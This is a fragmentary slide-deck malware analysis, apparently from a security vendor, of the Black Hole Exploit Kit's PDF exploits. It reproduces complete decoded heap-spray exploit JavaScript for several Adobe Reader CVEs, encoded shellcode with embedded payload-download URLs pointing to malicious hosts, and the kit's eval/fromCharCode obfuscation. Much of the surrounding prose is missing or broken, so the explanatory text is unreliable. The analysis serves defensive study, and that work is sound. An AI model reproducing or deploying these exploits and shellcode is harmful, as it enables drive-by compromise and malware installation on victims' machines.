Black Hole Exploit Kit 1.0.2 PDF Exploit Analysis SOFTFORUM Security Analysis Team 1
Black Hole Exploit Kit PDF Exploit: when $selectedexploit is 3 or 4, the kit serves /games/pdf.php or /games/pdf2.php; the PDF exploits target CVE-2007-5659, CVE-2008-2992, CVE-2009-0927, CVE-2009-4324 and CVE-2010-0188. 2
pdf.php is ionCube-encoded; it was decoded for analysis, and the decoded pdf.php is examined in the following slides. 3
4
PDF $pdf_script $pdf_template $pdf_script2 5
PDF generate $pdf_script 6
PDF generate $pdf_template 7
$pdf_script $pdf_script $sc $sc 8
$pdf_script var bjsg = '{$sc}'; function ezvr(ra, qy) { while (ra.length * 2 < qy) { ra += ra; } ra = ra.substring(0, qy / 2); return ra; } //v0nsch3lling //CVE-2007-5659 function bx() { var dkg = new Array(); var vw = 0x0c0c0c0c; var addr = 0x400000; var payload = unescape(bjsg); var sc_len = payload.length * 2; var qy = addr - (sc_len + 0x38); var yarsp = unescape(\"%u9090%u9090\"); yarsp=ezvr(yarsp,qy); var count2=(vw-0x400000)/addr; for(var count=0;count<count2;count++){dkg[count]=yarsp +payload;} var overflow=unescape(\"%u0c0c%u0c0c\"); while(overflow.length<44952){overflow+=overflow;} this.collabstore=collab.collectemailinfo({subj:"",msg:overflow}); } 9
$pdf_script //v0nsch3lling //CVE-2008-2992 function printf() { nop=unescape(\"%u0a0a%u0a0a%u0a0a%u0a0a\"); var payload=unescape(bjsg); heapblock=nop+payload; bigblock=unescape(\"%u0a0a%u0a0a\"); headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock +=bigblock;} \r\nfillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.lengthspray);while(block.length+spray<0x40000){block=block+block+fillblock;} \r\nmem=new Array();for (i=0;i<1400;i++){mem[i]=block+heapblock;} \r\nvar num=12999999999999999999888888888888888888888888888888888888888888888888888 8888888888888888888888888888888888888888888888888888888888888888888888888888 8888888888888888888888888888888888888888888888888888888888888888888888888888 8888888888888888888888888888888888888888888888888888888888888888888888888;util. printf("%45000f",num); } 10
$pdf_script //v0nsch3lling //CVE-2009-0927 function geticon() { var arry = new Array(); if (app.doc.collab.geticon) { var payload = unescape(bjsg); var hwq500cn = payload.length * 2; var qy = 0x400000 - (hwq500cn + 0x38); var yarsp = unescape(\"%u9090%u9090\"); yarsp=ezvr(yarsp,qy); var p5ajk65f=(0x0c0c0c0c-0x400000)/0x400000; for(var vqcqd96y=0;vqcqd96y<p5ajk65f;vqcqd96y++){arry[vqcqd96y]=yarsp+payload;} var tumhnbgw=unescape("%09"); while(tumhnbgw.length<0x4000){tumhnbgw+=tumhnbgw;} tumhnbgw="n."+tumhnbgw; app.doc.collab.geticon(tumhnbgw);} } 11
$pdf_script if((lv == 9) ((sv == 8) && (lv <= 8.12))) { geticon(); } else if (lv == 7.1) { printf(); } else if (((sv == 6) (sv == 7)) && (lv < 7.11)) { bx(); } else if ((lv >= 9.1) (lv <= 9.2) (lv >= 8.13) (lv <= 8.17)) { function a() { util.printd('p@111111111111111111111111 : yyyy111', new Date()); } //v0nsch3lling //CVE-2009-4324 var h = app.plugins; for (var f = 0; f < h.length; f++) { if (h[f].name == 'EScript') { var i = h[f].version; } } } } if((i > 8.12) && (i < 8.2)) { c = new Array(); var d = unescape('%u9090%u9090'); var e = unescape(bjsg); while (d.length <= 0x8000) { d += d; } d = d.substr(0, 0x8000 - e.length); for (f = 0; f < 2900; f++) { c[f] = d + e; } a(); a(); try { this.media.newplayer(null); } catch(e) {} a(); 12
$sc $sc GOOGLING jsunpack $sc NWS decoder /lib/sc.php Decode http://jsunpack.jeek.org/dec/go?report=adc1016ee0e23e53ba867e9d3ba16c741f26c509 13
$sc //v0nsch3lling //from http://jsunpack.jeek.org/dec/go?report=adc1016ee0e23e53ba867e9d3ba16c741f26c509 var bjsg='%u9090%u9090%u16eb %u45b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u9134%ue2aa%uc3fa%ue5e8%uffff %u78ff%u909d%u9191%u10cf%ucd7d%u9190%u1891%u1c76%u81de%ufe1c%ua0c5%uc64a %uc2c0%uc2c2%uc2c2%uc2c2%uc2c4%uf9c2%u9095%u9191%uc7c4%uf9c2%ufffe %u9191%ue4f9%ufde3%uc5fc%u1ff9%u9fdf%u797d%u91d9%u9191%u79c1%u91ed%u9191%u416e %u5512%uf999%u7ede%u94de%u79c1%u91fd%u9191%u416e%u5114%u86e4%uc5fb%u62c8%uf93b %u6fe3%u8722%u8c79%u9191%uc191%uc079%u9191%u6e91%uc241%u6ffb%u18f9%u90fe%u792c %u9199%u9191%u79c1%u91ad%u9191%u416e%ua0f1%uf551%uc11a%u1aa1%u9dc3%uc31a %u1a85%ub9e3%u8928%u9191%ua091%ua06e%u3d51%uf0ad%u93ed%ub1bd%u5e50%u909c %u7356%u1061%uca6e%udb2d%u1afb%u81d3%u831a%u48e4%ud518%u8db5%u52f0%u1af1%ub5fd %u1ab5%uadd4%uc51a%ue994%u7b90%udb1a%u1a89%ub1cb %u7a90%ua572%u1ad8%u1aa5%u7f90%u6ea0%u51a0%u3d6d%u5115%u96e5%u5e50%u909c %u7a56%uaa65%ub5ed%ue4b9%u1a70%ub5cb%u7a90%u1af7%uda9d%ucb1a%u908d%u1a7a %u1a95%u7990%ud518%u8db5%u53f0%u9199%u7e79%u6e6f%uf96e%ue5e5%uabe1%ubebe %uf0f7%ue4e7%uf0f7%ue4f5%uf3bf%uf8e3%uf6f5%ue3f4%ufdf4%uf4fc%ubfe3%ue4e3%uf5be%ue1bf %ue1f9%uf7ae%ua3ac%ub7a8%uacf4%u91a4' 14
$sc(shell2exe) shell2exe Packing 0040101B 15
$sc(shell2exe) URL http://favufadu.bridgerelmer.ru/d.php?f=29&e=5 16
$sc(shell2exe) 17
pdf2.php pdf2.php pdf.php jsunpack PDF Exploit PDF exploit 76.76.107.98/games/pdf2.php? f=89 http://jsunpack.eyeprotectiongroup.com/dec/go?report=fd29c743a280d25ca3245dc02a8d990be2ccfe35 18
pdf2.php 19
pdf2.php jsunpack PDF Exploit PDF Exploit Encoding 20
pdf2.php Decoding, Object 5 Javascript khfdskjfg Object 7 <script contenttype="application/x-javascript"> var a = khfdskjfh.rawvalue; no=eval(a.substr(0,3)+'l'); //v0nsch3lling no = eval var azeg='',xk=[]; vtvo=no(a.substr(3,19)); //v0nsch3lling vtvo = String.fromCharCode var davx = a.substr(22).split(','); var dcvt = davx.length / 2; for (var cf = 0; cf < dcvt; cf++) { rd=davx[cf+dcvt] - davx[cf]; azeg += vtvo(rd); //v0nsch3lling azeg += String.fromCharcode(rd) } no(azeg); //v0nsch3lling eval(azeg) --> Execute JataScript </script> 21
pdf2.php khfdskjfg <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/ 1.0/"><xfa:data><yomRote><khfdskjfh>evaString.fromCharCode1387,1248,1285,461,1679,1446,1003,45 3,1607,349,376,452,1338,635,1401,120,1366,554,62,1046,418,1389,204,520,306,1929,1604,1156,320, 1986,1734,60,1586,1019,873,1617,465,1876,422,424,226,798,876,1916,1433,630,388,1152,1184,802, 198,1602,191,754,475,850,1035,431,6,1707,769,1740,1767,355,760,641,1972,1577,869,394,2,1447,15 44,1230,1364,978,212,1752,482,1397,555,680,1351,746,1786,178,1948,821,609,1955,528,1378,47,64 8,85,1159,1289,409,737,510,1155,739,1958,700,321,1322,30,534,1074,512,283,1981,1544,1634,1080, 1330,165,1028,503,774,1335,1383,505,1383,31,942,542,1672,1352,1279,183,507,370,141,1559,692,1 815,1589,1226,1241,101,1861,1223,1997,1495,303,1679,12,1331,182,787,667,1566,1644,402,1949,58 6,944,1622,290,576,1805,798,946,298,357,1990,113,299,1568,1354,752,1429,577,750,1277,1232,429, 1289,916,612,428,1935,530,72,337,479,1011,1281,453,1301,1857,258,451,1156,556,1161,1146,1021, 1812,715,376,564,496,1305,1314,1773,538,96,1063,1806,1060,1491,1741,1590,1916,78,421,1279,171 1,875,932,1921,1485,1736,1077,394,1249,575,1415,1061,1290,143,1625,1787,1801,1292,1912,691,13 88,975,497,448,819,238,390,1087,668,1163,718,379,390,2,300,1876,1738,1729,622,1339,305,37,400, 1947,533,378,1734,334,1670,1647,1025,1410,974,1522,210,145,112,952,1232,780,467,302,1511,858, 305,1812,734,395,1541,1708,1735,198,97,135,146,630,513,1880,1316,535,1879,341,297,1206,215,85 9,1351,679,163,936,1811,631,1238,1323,1489,1895,1135,575,291,1028,283,26,1227,380,161,1373,13 63,1027,1605,679,1914,1837,1373,564,1395,1940,1423,746,620,1939,34,431,570,1625,1754,59,1520, 1241,986,163,622,1621,189,201,1,703,1574,1716,82,1531,396,1996,1720,121,912,1115,61,688,214,10 33,627,248,1465,1197,225,1571,1608,1746,1165,594,261,1787,567,451,1988,568,1506,1914,637,1588 22
pdf2.php: the khfdskjfg data is decoded with String.fromCharCode and passed to eval (aliased as no); the decoded JavaScript string azeg can be dumped with document.write(azeg) instead of executed, which is how it was recovered here. 23
pdf2.php 24
pdf2.php Javascript _AU() _FM() _X() _NO() decoded _G() _UG() _UB() _CR() 25
pdf2.php heap-sprays the shellcode; the sprayed shellcode (selected by Reader version) is shown on the next two slides. 26
pdf2.php Shellcode 9000 (_AR < 9000) _H = "%u204c%u0f60%u1705%u4a80%u203c%u0f60%u630f %u4a80%ueba3%u4a80%u2030%u4a82%u2f6e %u4a80%u4141%u4141%u0026%u0000%u0000%u0000%u0000%u0000%u0000% u0000%u3912%u4a80%u2064%u0f60%u0400%u0000%u4141%u4141%u4141%u41 41%u83b0%u9090%u16eb %u35b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%ub034%ue2aa %uc3fa%ue5e8%uffff%u59ff%ub1bc%ub0b0%u31ee%uec5c %ub0b1%u39b0%u3d57%ua0ff%udf3d%u81e4%ue76b %ue3e1%ue3e3%ue3e3%ue3e3%ue3e5%ud8e3%ub1b4%ub0b0%ue6e5%ud8e3%u dedf%ub0b0%uc5d8%udcc2%ue4dd%u3ed8%ubefe%u585c %ub0f8%ub0b0%u58e0%ub0cc%ub0b0%u604f%u7433%ud8b8%u5fff%ub5ff %u58e0%ub0dc%ub0b0%u604f%u7035%ua7c5%ue4da%u43e9%ud81a %u4ec2%ua603%uad58%ub0b0%ue0b0%ue158%ub0b0%u4fb0%ue360%u4eda %u39d8%ub1df%u580d%ub0b8%ub0b0%u58e0%ub08c%ub0b0%u604f %u81d0%ud470%ue03b%u3b80%ubce2%ue23b... http://76.76.107.??/d.php?f=89 27
pdf2.php Shellcode 9000 (_AR >= 9000) _H = "%u204c%u0f60%u63a5%u4a80%u203c %u0f60%u2196%u4a80%u1f90%u4a80%u9030%u4a84%u7e7d %u4a80%u4141%u4141%u0026%u0000%u0000%u0000%u0000%u0000%u0000% u0000%u8871%u4a80%u2064%u0f60%u0400%u0000%u4141%u4141%u4141%u41 41%u83b0%u9090%u16eb %u35b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%ua934%ue2aa %uc3fa%ue5e8%uffff%u40ff%ua8a5%ua9a9%u28f7%uf545%ua9a8%u20a9%u244e %ub9e6%uc624%u98fd%ufe72%ufaf8%ufafa%ufafa%ufafa%ufafc%uc1fa%ua8ad %ua9a9%ufffc%uc1fa%uc7c6%ua9a9%udcc1%uc5db %ufdc4%u27c1%ua7e7%u4145%ua9e1%ua9a9%u41f9%ua9d5%ua9a9%u7956%u6 d2a%uc1a1%u46e6%uace6%u41f9%ua9c5%ua9a9%u7956%u692c%ubedc %ufdc3%u5af0%uc103%u57db%ubf1a %ub441%ua9a9%uf9a9%uf841%ua9a9%u56a9%ufa79%u57c3%u20c1%ua8c6%u41 14%ua9a1%ua9a9%u41f9%ua995%ua9a9%u7956%u98c9%ucd69%uf922%u2299... http://76.76.107.98/d.php?f=89 28
pdf2.php Shellcode Shellcode Access Violation NOP Shellcode URL jsunpack URL 29